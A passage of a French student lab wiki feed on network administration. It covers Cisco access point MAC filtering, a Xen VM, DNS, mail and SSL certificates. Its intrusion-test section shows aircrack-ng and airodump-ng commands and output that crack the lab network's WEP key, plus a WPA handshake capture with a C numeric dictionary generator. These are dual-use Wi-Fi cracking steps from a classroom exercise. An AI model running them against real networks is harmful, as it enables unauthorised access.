Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;a) Préparation &amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;b) Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;c) Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 - creation d'un dictionaire :&lt;br /&gt;
code C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23125</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23125"/>
				<updated>2015-11-22T17:25:16Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h1&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;a) Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;a) Préparation &amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;b) Cassage d'une cles WEP &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
